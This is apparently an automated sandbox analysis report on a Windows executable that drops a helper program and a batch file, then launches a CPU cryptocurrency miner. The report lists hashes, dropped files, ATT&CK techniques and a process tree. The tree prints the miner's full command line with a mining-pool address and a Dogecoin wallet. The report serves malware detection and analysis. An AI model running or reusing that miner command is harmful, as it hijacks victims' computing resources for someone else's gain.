73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72

Analysis

max time kernel
294s
max time network
303s
platform
windows10-2004_x64
resource
win10v2004-20240221-ja
resource tags

arch:x64arch:x86image:win10v2004-20240221-jalocale:ja-jpos:windows10-2004-x64systemwindows
submitted
23/02/2024, 12:39

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

batexe.exe
Size

9.4MB
MD5

cdc9eacffc6d2bf43153815043064427
SHA1

d05101f265f6ea87e18793ab0071f5c99edf363f
SHA256

73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72
SHA512

fc6945957e160bf7059c936c329aae438e6c1521e5e43a8434f58058230d89e818eb6ff80331a4b952dbb600b8cc134ecba54e5641bf549723c98f85e993fde6
SSDEEP

196608:ERAefrn9wcsTRAJgwusnWpV3h9XxSeEGaT+TKkGzySdUkI56kBIyky:E5Tn9YVwdnWLXxkvLlzkuv

Score

7^/10

upx

Malware Config

Signatures

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-1712835645-2080934712-2142796781-1000\Control Panel\International\Geo\Nation	batexe.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1712835645-2080934712-2142796781-1000\Control Panel\International\Geo\Nation	b2e.exe

Executes dropped EXE 2 IoCs

pid	Process
2188	b2e.exe
644	cpuminer-sse2.exe

Loads dropped DLL 5 IoCs

pid	Process
644	cpuminer-sse2.exe
644	cpuminer-sse2.exe
644	cpuminer-sse2.exe
644	cpuminer-sse2.exe
644	cpuminer-sse2.exe

UPX packed file 1 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/memory/5020-9-0x0000000000400000-0x000000000393A000-memory.dmp	upx

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious use of WriteProcessMemory 8 IoCs

description	pid	Process	procid_target
PID 5020 wrote to memory of 2188	5020	batexe.exe	89
PID 5020 wrote to memory of 2188	5020	batexe.exe	89
PID 5020 wrote to memory of 2188	5020	batexe.exe	89
PID 2188 wrote to memory of 3892	2188	b2e.exe	90
PID 2188 wrote to memory of 3892	2188	b2e.exe	90
PID 2188 wrote to memory of 3892	2188	b2e.exe	90
PID 3892 wrote to memory of 644	3892	cmd.exe	93
PID 3892 wrote to memory of 644	3892	cmd.exe	93

C:\Users\Admin\AppData\Local\Temp\batexe.exe
"C:\Users\Admin\AppData\Local\Temp\batexe.exe"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:5020
- C:\Users\Admin\AppData\Local\Temp\6292.tmp\b2e.exe
  "C:\Users\Admin\AppData\Local\Temp\6292.tmp\b2e.exe" C:\Users\Admin\AppData\Local\Temp\6292.tmp\b2e.exe C:\Users\Admin\AppData\Local\Temp "C:\Users\Admin\AppData\Local\Temp\batexe.exe"
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:2188
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\65FD.tmp\batchfile.bat" "
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3892
  - - C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe
      cpuminer-sse2.exe -a yespower -o stratum+tcp://yespower.sea.mine.zpool.ca:6234 --userpass=DJXKcu8iouhRppneQL9XbYQ9ovs87y4cYZ:c=doge -t 3
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      PID:644

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\6292.tmp\b2e.exe

Filesize
17.9MB

MD5
d79c5c80fd2f2cb0747da2eaf8178d9a

SHA1
293e35cc9c43928d19eb21fc4e7de989174b9ed5

SHA256
7c1a21f4ad06a6557950bb7b49eb88fec92ea1e735cfd328e0870885ade1ac64

SHA512
c089750b70f7ff67d234147e9a5ff913fa05bfed9c558c0fea898e5d88c1a318c3f5f99c274b94785078da40111353735fb33bf4c8ec414452d4a7c38efe3c2f

Download Submit
C:\Users\Admin\AppData\Local\Temp\6292.tmp\b2e.exe

Filesize
4.5MB

MD5
d7249c9b3be971c6a63436b2205fac71

SHA1
7b0c7d18350870e7339723ac94148a3503739623

SHA256
19bd80bb1dd28aa6a94031e9f4ea062cc71d7f81c1d0b36d588129a746b379cf

SHA512
4b40570ac89073b0faf57a74ed7f50612cf897bcf89bdf3d9bceaa7c2490164ee4715b7206777027ffb5d7be1ee699185a742ef9b5ec8f62fb77dd97b591bc74

Download Submit
C:\Users\Admin\AppData\Local\Temp\6292.tmp\b2e.exe

Filesize
4.8MB

MD5
f68398c4a6a599c98a6a7b7f9a4d5ef0

SHA1
a7e282dc37965a3c47a398a3cdeebe2e96e7904a

SHA256
7fa1857aa290d707780ba09718f14f94c9bfd51851d163ca28c1d7be720a9c80

SHA512
a2849e4a4df454f96f6243762a8f42252329db97137f8910910a95c76250b7cd9822bcd33540a6107f6368e39236d3896f1cdd5cfb881e66c37ea6ad57b27aae

Download Submit
C:\Users\Admin\AppData\Local\Temp\65FD.tmp\batchfile.bat

Filesize
136B

MD5
8ea7ac72a10251ecfb42ef4a88bd330a

SHA1
c30f6af73a42c0cc89bd20fe95f9159d6f0756c5

SHA256
65e2674fc9b921a76deaf3740603359794c04e059e8937ab36eb931d65f40ec9

SHA512
a908979d588625aa24eb81238d07d88a56be5388e1265ebd2fe09889ed807aa9a4af77107e72a843c31acadbe06db0d7f6f6a3c95fb481a71e549e8eb74c2ff0

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe

Filesize
1.5MB

MD5
d392ba112af1ebd2a1a21a484a9a306e

SHA1
2d69c466930e4f22647a88f0ab2087f1dfc4d448

SHA256
d20a898bfc872fdd134ff2504e04e00e9ca766a1bf7d381f790294dc359090b0

SHA512
31a4acf6849d8b5a8a37cfc9f8fe3a604dbe64e2afce01151939ade0d7ceaf5f4c307e11717ca24dc5edc3b7848e24681a754c476795f80e7fd361ae64c00eef

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe

Filesize
1.5MB

MD5
e8c20b7c3deb71ca71e2c41a495fa45d

SHA1
041a84d96f686eeefd27862a5980b3fc0ba51fee

SHA256
0140b08a3416df969e0e481b99b4761b34698011f36900c5189c525767a114d9

SHA512
347c8c6b90e39bdfc17d5bd674d1f718ee93cc619697c976ddc18eb59b327f604b9ba4740d3039053b3d29c96f3dd8d1a7831f2e09ddebc62e1e6c589be98d0d

Download Submit
C:\Users\Admin\AppData\Local\Temp\libcurl-4.dll

Filesize
836KB

MD5
aeab40ed9a8e627ea7cefc1f5cf9bf7a

SHA1
5e2e8ca2881b9bf9edfa3c4fdcec6da1efa102d8

SHA256
218cfc4073bab4eddf0de0804f96b204687311e20a9e97994bff54c9b0e01ee9

SHA512
c0a67616fa01fdc351015212a718faf70da6612fbb3ec13da28dd7af9a507c56882fb7c3eea6fbc37d4d63b970157199d16d0756dbe3cb3bc2223e215cb104d8

Download Submit
C:\Users\Admin\AppData\Local\Temp\libgcc_s_seh-1.dll

Filesize
1.2MB

MD5
7cf672bee2afba2dcd0c031ff985958e

SHA1
6b82a205db080ffdcb4a4470fce85a14413f3217

SHA256
c82f84171b9246d1cac261100b2199789c96c37b03b375f33b2c72afab060b05

SHA512
3e90d1c1efe0200cb3cc7b51d04783a3cce8391faa6ce554cff8b23dac60be9f8e4f980a8ac005fd9dff8ea4bdcb02311f7649c5be28eb32dcc26417fc4090e5

Download Submit
C:\Users\Admin\AppData\Local\Temp\libgcc_s_seh-1.dll

Filesize
754KB

MD5
a8ffef9f19ee8dae53f0ffbcef172b3c

SHA1
e736bc2f24dc2a066d8ae32e556d5d2bf3e73473

SHA256
af5c262327542f989319bab80a18bee02a30938509a7cafaed820f96b44b77e7

SHA512
441cf1ff930a6dc493931913fa86837ad184e85b5e32b1780fb5e71aa6f1f2a804e318fb247ab38385e8a084c302d4396196feca5f45fd0b55e9478ed08d7322

Download Submit
C:\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
279KB

MD5
e17cfc442ea7002ffa3b3d7f8b287b4c

SHA1
158483da6262b7a2ffcac6183b4cbe6e28f39c79

SHA256
a2737f13312274d2b6383a2c9336e34f4d93949433ae552dfcefb706c2b08479

SHA512
76d66bd0e89b151ea613408d0a034540fa655d6b99ebb1218814f546db919834eb4a5fe06376ae19c3b0b34447ccb2b205e6563a9c82ee86cf2e064f55ef121f

Download Submit
C:\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
1.1MB

MD5
b6dbb10d91340b701f84c329e9814780

SHA1
0852aac6b1e2f2e1057743c2023ea7f139ed4ea7

SHA256
47d0775119c1b66883d9051f0dc2a8148e34cc5e95876cd4d07a2090a4171929

SHA512
78485af2c43adae7a41770ac225b70b7a4839d1adef24550260b38dd8b4daa15de24f561cfc378419e44e1d2184dfa6daa369316b20cf77b00243975dd73bbe8

Download Submit
C:\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
535KB

MD5
4ff487c00751a820fbef8620d02f4380

SHA1
e6286fae9aa2d2bdc1aa0415218cdf2094062d4c

SHA256
ea59e02e98e2def65d536053109173975901e6f3bbb9661b6ce604e1f97721ca

SHA512
8eb4cb25dfea90b35041224b893c9d381c656f62747d2b2ed5c084b600b6774edc92abe47b626b2d9ea82120878dd253aec32d5a51076d0ca5696c0aae1e0f1c

Download Submit
C:\Users\Admin\AppData\Local\Temp\libwinpthread-1.dll

Filesize
606KB

MD5
585efec1bc1d4d916a4402c9875dff75

SHA1
d209613666ccac9d0ddab29a3bc59aa00a0968fa

SHA256
2f9984c591a5654434c53e8b4d0c5c187f1fd0bab95247d5c9bc1c0bd60e6232

SHA512
b93163cba4601ed999a7a7d1887113792e846c36850c6d84f2d505727dc06524bb959469f9df12928769f4535dc6074a6b3599b788a4844353e466742ce1e770

Download Submit
memory/644-45-0x0000000073C10000-0x0000000073CA8000-memory.dmp

Filesize
608KB

Download
memory/644-64-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/644-43-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/644-44-0x0000000070800000-0x00000000708BC000-memory.dmp

Filesize
752KB

Download
memory/644-94-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/644-46-0x0000000061440000-0x000000006156B000-memory.dmp

Filesize
1.2MB

Download
memory/644-47-0x0000000001010000-0x00000000028C5000-memory.dmp

Filesize
24.7MB

Download
memory/644-48-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/644-89-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/644-59-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/644-74-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/644-69-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2188-8-0x0000000000400000-0x0000000000405000-memory.dmp

Filesize
20KB

Download
memory/2188-53-0x0000000000400000-0x0000000000405000-memory.dmp

Filesize
20KB

Download
memory/5020-9-0x0000000000400000-0x000000000393A000-memory.dmp

Filesize
53.2MB

Download